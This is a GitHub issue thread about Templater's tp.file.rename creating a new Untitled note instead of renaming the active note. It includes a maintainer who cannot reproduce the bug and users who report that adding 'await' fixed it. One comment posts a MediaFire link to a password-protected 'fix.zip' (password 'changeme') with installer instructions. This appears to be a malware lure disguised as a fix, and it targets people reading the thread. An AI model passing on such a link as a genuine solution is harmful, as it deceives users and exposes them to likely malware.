### ISSUE TITLE
Using tp.file.rename doesn't rename current note but creates a new note instead

### ISSUE THREAD

**Issue by erldipin** [SilentVoid13/Templater#1441]
**Plugin information (please complete the following information):**

-   OS: Windows 10
-   Templater version: 2.4.2
-   Obsidian version: 1.4.7
-   Templater settings: [e.g. Template folder location: "Templates/", Timeout: "5" (add the templates not working with their associated command)]

My old template that used to work, appending a property called "Name" to the end of the current note:
`let fileName = (app.workspace.getActiveFile()).basename;
const fileNameTitle = DataviewAPI.page(tp.file.find_tfile(fileName).path)
await tp.file.rename(tp.file.title + " - " + fileNameTitle.Name)`

And the simplified test template:
`await tp.file.rename(tp.file.title + " - " + tp.file.title)`

**Describe the bug**
I run a template with tp.file.rename in an open note titled with the time and date, and it creates a new Untitled note called "Untitled - Name", using the Name property from the original note that I ran the template in. I simplified the code just to check if something got updated and the original code was broken, and I get a new note called "Untitled - Untitled" now.

**Expected behavior**
When I run a template using tp.file.rename, the filename of the currently open, active note should be changed, with the Name property appended to the end of the current title.

**Screenshots**

**Additional context**
I'm not very knowledgeable about coding so please let me know if the code isn't written correctly and it was a fluke that it worked in the first place. I cobbled together the original template together from various posts on the Obsidian forum.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Zachatoo** [comment]
I can't reproduce on the latest versions of Templater and Obsidian, am I doing anything differently? I've attached a video of using your simplified test template and it appears to be working fine.

https://github.com/user-attachments/assets/723cfcc4-c13b-4860-a2d5-a9314da18d66

Obsidian version: v1.7.0
Installer version: v1.4.13
Templater version: v2.4.2

**Comment by Zachatoo** [comment]
Closing due to no response.

**Comment by d0verenny** [comment]
I have the same problem. but with `tp.file.name`. When I click "Create templater_directory/template_name.md" -- it creates a new Untitled file, and with Untitled headings where it supposed to fetch the name of the file.

I thought some plugins meddled with it, but I turned them all off except for templater, to check if it'll fix the problem. It didn't fix it.

I also thought git meddling with LF/CRLF has got to do something with it, because I got these warnings about LF will be replaced by CRLF. I set git config --global core.autocrlf to true, since I use the vault on Android too. It didin't fix it either. 

I have an old version of my vault I archieved on my PC as means of quick backup, and `tp.file.name` it works fine there.

**Comment by Zachatoo** [comment]
`tp.file.name` isn't a thing, do you mean [`tp.file.title`](https://silentvoid13.github.io/Templater/internal-functions/internal-modules/file-module.html#tpfiletitle)?

Regardless, please open a new bug report with detailed reproduction steps, following the bug report template.

**Comment by MrModest** [comment]
I had the same issue with `tp.file.rename`. It got fixed once I added the `await` keyword.

**Comment by TrueScare** [comment]
> I had the same issue with `tp.file.rename`. It got fixed once I added the `await` keyword.

This one did it for me.
